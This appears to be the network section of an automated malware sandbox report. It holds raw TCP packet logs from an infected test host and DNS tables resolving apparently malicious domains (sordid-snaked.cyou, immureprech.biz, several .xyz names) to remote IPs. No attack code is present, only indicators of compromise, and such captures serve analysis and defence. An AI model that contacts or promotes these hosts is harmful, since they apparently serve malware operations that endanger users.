                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.683389902 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.683424950 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.685183048 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.685247898 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.685281992 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.685317993 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.687133074 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.687155962 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.687195063 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.687218904 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.689018965 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.689074993 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.689110041 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.689145088 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.690844059 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.690896034 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.690938950 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.690973997 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.692728996 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.692797899 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.692847013 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.692892075 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.694605112 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.694662094 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.694700956 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.694736004 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.696518898 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.696573019 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.696604967 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.696641922 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.698363066 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.698385000 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.698427916 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.698427916 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.700275898 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.700325966 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.700381994 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.700417042 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.702172041 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.702225924 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.702254057 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.702290058 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.704062939 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.704118013 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.704154968 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.704191923 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.705944061 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.706012011 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.706027031 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.706063986 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.707806110 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.707863092 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.799968958 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.800009966 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.800112963 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.800134897 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.800721884 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.800818920 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.800822020 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.800863028 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.802242041 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.802289963 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.802897930 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.803035975 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.803078890 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.803078890 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.804344893 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.804451942 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.804470062 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.804511070 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.805820942 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.805877924 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.805936098 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.805983067 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.807360888 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.807420969 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.807444096 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.807482958 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.808804989 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.808866024 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.808868885 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.808903933 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.810292006 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.810358047 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.810415030 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.810457945 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.811739922 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.811790943 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.811811924 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.811846972 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.813178062 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.813230991 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.813296080 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.813343048 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.814718008 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.814771891 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.814862967 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.814908028 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.816065073 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.816121101 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.816142082 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.816179037 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.817435980 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.817490101 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.817507029 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.817543983 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.818824053 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.818878889 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.818909883 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.818947077 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.820156097 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.820226908 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.820247889 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.820285082 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.821576118 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.821633101 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.821641922 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.821680069 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.822855949 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.822916031 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.822978973 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.823024988 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.824165106 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.824223042 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.824291945 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.824337959 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.825524092 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.825581074 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.825609922 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.825648069 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.826836109 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.826898098 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.826915026 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.826951981 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:48.460630894 CET49706443192.168.2.5104.131.68.180
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:48.460689068 CET44349706104.131.68.180192.168.2.5
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:48.460777998 CET49706443192.168.2.5104.131.68.180
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:48.462017059 CET49706443192.168.2.5104.131.68.180
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:48.462038994 CET44349706104.131.68.180192.168.2.5
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:49.209098101 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:49.209176064 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:49.777365923 CET44349706104.131.68.180192.168.2.5
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:49.777440071 CET49706443192.168.2.5104.131.68.180
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:49.781261921 CET49706443192.168.2.5104.131.68.180
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:49.781275988 CET44349706104.131.68.180192.168.2.5
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:49.781584978 CET44349706104.131.68.180192.168.2.5
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:49.825527906 CET49706443192.168.2.5104.131.68.180
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:49.827897072 CET49706443192.168.2.5104.131.68.180
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:49.827922106 CET49706443192.168.2.5104.131.68.180
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:49.828177929 CET44349706104.131.68.180192.168.2.5
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:50.284192085 CET44349706104.131.68.180192.168.2.5
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:50.284291029 CET44349706104.131.68.180192.168.2.5
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:50.284411907 CET49706443192.168.2.5104.131.68.180
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:50.285160065 CET49706443192.168.2.5104.131.68.180
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:50.285213947 CET44349706104.131.68.180192.168.2.5
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:50.285247087 CET49706443192.168.2.5104.131.68.180
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:50.285264015 CET44349706104.131.68.180192.168.2.5
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:50.433207989 CET49708443192.168.2.545.77.249.79
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:50.433250904 CET4434970845.77.249.79192.168.2.5
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:50.433454037 CET49708443192.168.2.545.77.249.79
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:50.433814049 CET49708443192.168.2.545.77.249.79
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:50.433823109 CET4434970845.77.249.79192.168.2.5
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:52.338892937 CET4434970845.77.249.79192.168.2.5
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:52.338975906 CET49708443192.168.2.545.77.249.79
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:52.350408077 CET49708443192.168.2.545.77.249.79
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:52.350433111 CET4434970845.77.249.79192.168.2.5
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:52.351262093 CET4434970845.77.249.79192.168.2.5
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:52.354011059 CET49708443192.168.2.545.77.249.79
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:52.354028940 CET49708443192.168.2.545.77.249.79
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:52.354171038 CET4434970845.77.249.79192.168.2.5
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:53.290092945 CET4434970845.77.249.79192.168.2.5
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:53.290227890 CET4434970845.77.249.79192.168.2.5
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:53.290314913 CET49708443192.168.2.545.77.249.79
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:53.290378094 CET49708443192.168.2.545.77.249.79
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:53.290394068 CET4434970845.77.249.79192.168.2.5
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:53.290407896 CET49708443192.168.2.545.77.249.79
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:53.290412903 CET4434970845.77.249.79192.168.2.5
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:54.778925896 CET49715443192.168.2.5104.121.10.34
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:54.778966904 CET44349715104.121.10.34192.168.2.5
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:54.779046059 CET49715443192.168.2.5104.121.10.34
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:54.779577971 CET49715443192.168.2.5104.121.10.34
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:54.779592037 CET44349715104.121.10.34192.168.2.5
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:56.178626060 CET44349715104.121.10.34192.168.2.5
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:56.178703070 CET49715443192.168.2.5104.121.10.34
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:56.180638075 CET49715443192.168.2.5104.121.10.34
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:56.180651903 CET44349715104.121.10.34192.168.2.5
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:56.181180954 CET44349715104.121.10.34192.168.2.5
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:56.182602882 CET49715443192.168.2.5104.121.10.34
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:56.223376989 CET44349715104.121.10.34192.168.2.5
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:56.932965994 CET44349715104.121.10.34192.168.2.5
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:56.932986975 CET44349715104.121.10.34192.168.2.5
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:56.933038950 CET44349715104.121.10.34192.168.2.5
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:56.933041096 CET49715443192.168.2.5104.121.10.34
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:56.933054924 CET44349715104.121.10.34192.168.2.5
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:56.933098078 CET49715443192.168.2.5104.121.10.34
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:56.933140039 CET49715443192.168.2.5104.121.10.34
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:57.110771894 CET44349715104.121.10.34192.168.2.5
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:57.110861063 CET44349715104.121.10.34192.168.2.5
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:57.110878944 CET49715443192.168.2.5104.121.10.34
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:57.110893965 CET44349715104.121.10.34192.168.2.5
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:57.110937119 CET49715443192.168.2.5104.121.10.34
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:57.111222029 CET49715443192.168.2.5104.121.10.34
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:57.111233950 CET44349715104.121.10.34192.168.2.5
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:57.111268044 CET49715443192.168.2.5104.121.10.34
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:57.111378908 CET44349715104.121.10.34192.168.2.5
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:57.111402035 CET44349715104.121.10.34192.168.2.5
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:57.111628056 CET49715443192.168.2.5104.121.10.34
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:57.111640930 CET49715443192.168.2.5104.121.10.34
                                                                                                                                                                                                                                      Dec 17, 2024 08:20:30.232096910 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                      Dec 17, 2024 08:20:30.544508934 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                      Dec 17, 2024 08:20:31.154181957 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                      Dec 17, 2024 08:20:32.372675896 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                      Dec 17, 2024 08:20:34.794528961 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                      Dec 17, 2024 08:20:39.625622034 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                      Dec 17, 2024 08:20:49.341408014 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:40.245409966 CET5663953192.168.2.51.1.1.1
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:40.391401052 CET53566391.1.1.1192.168.2.5
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:48.082320929 CET6191653192.168.2.51.1.1.1
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:48.303114891 CET53619161.1.1.1192.168.2.5
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:48.315792084 CET6347853192.168.2.51.1.1.1
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:48.454016924 CET53634781.1.1.1192.168.2.5
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:50.289402962 CET4970253192.168.2.51.1.1.1
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:50.427267075 CET53497021.1.1.1192.168.2.5
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:53.291661978 CET5178153192.168.2.51.1.1.1
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:53.515034914 CET53517811.1.1.1192.168.2.5
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:53.516769886 CET6095753192.168.2.51.1.1.1
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:53.739248037 CET53609571.1.1.1192.168.2.5
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:53.742917061 CET5145453192.168.2.51.1.1.1
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:54.050884008 CET53514541.1.1.1192.168.2.5
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:54.053891897 CET6207353192.168.2.51.1.1.1
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:54.271794081 CET53620731.1.1.1192.168.2.5
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:54.274547100 CET5572553192.168.2.51.1.1.1
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:54.496803999 CET53557251.1.1.1192.168.2.5
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:54.498502970 CET6522653192.168.2.51.1.1.1
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:54.636981964 CET53652261.1.1.1192.168.2.5
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:54.640297890 CET6285553192.168.2.51.1.1.1
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:54.777930021 CET53628551.1.1.1192.168.2.5
                                                                                                                                                                                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:40.245409966 CET192.168.2.51.1.1.10xae6eStandard query (0)post-to-me.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:48.082320929 CET192.168.2.51.1.1.10x57d1Standard query (0)sordid-snaked.cyouA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:48.315792084 CET192.168.2.51.1.1.10x1950Standard query (0)immureprech.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:50.289402962 CET192.168.2.51.1.1.10xfd40Standard query (0)deafeninggeh.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:53.291661978 CET192.168.2.51.1.1.10x2108Standard query (0)effecterectz.xyzA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:53.516769886 CET192.168.2.51.1.1.10x375fStandard query (0)diffuculttan.xyzA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:53.742917061 CET192.168.2.51.1.1.10xc066Standard query (0)debonairnukk.xyzA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:54.053891897 CET192.168.2.51.1.1.10x7d9Standard query (0)wrathful-jammy.cyouA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:54.274547100 CET192.168.2.51.1.1.10xf856Standard query (0)awake-weaves.cyouA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:54.498502970 CET192.168.2.51.1.1.10xe940Standard query (0)sordid-snaked.cyouA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:54.640297890 CET192.168.2.51.1.1.10x88e8Standard query (0)steamcommunity.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:40.391401052 CET1.1.1.1192.168.2.50xae6eNo error (0)post-to-me.com104.21.56.70A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:40.391401052 CET1.1.1.1192.168.2.50xae6eNo error (0)post-to-me.com172.67.179.207A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:48.303114891 CET1.1.1.1192.168.2.50x57d1Name error (3)sordid-snaked.cyounonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:48.454016924 CET1.1.1.1192.168.2.50x1950No error (0)immureprech.biz104.131.68.180A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:48.454016924 CET1.1.1.1192.168.2.50x1950No error (0)immureprech.biz45.77.249.79A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:48.454016924 CET1.1.1.1192.168.2.50x1950No error (0)immureprech.biz178.62.201.34A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:50.427267075 CET1.1.1.1192.168.2.50xfd40No error (0)deafeninggeh.biz45.77.249.79A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:50.427267075 CET1.1.1.1192.168.2.50xfd40No error (0)deafeninggeh.biz178.62.201.34A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:50.427267075 CET1.1.1.1192.168.2.50xfd40No error (0)deafeninggeh.biz104.131.68.180A (IP address)IN (0x0001)false
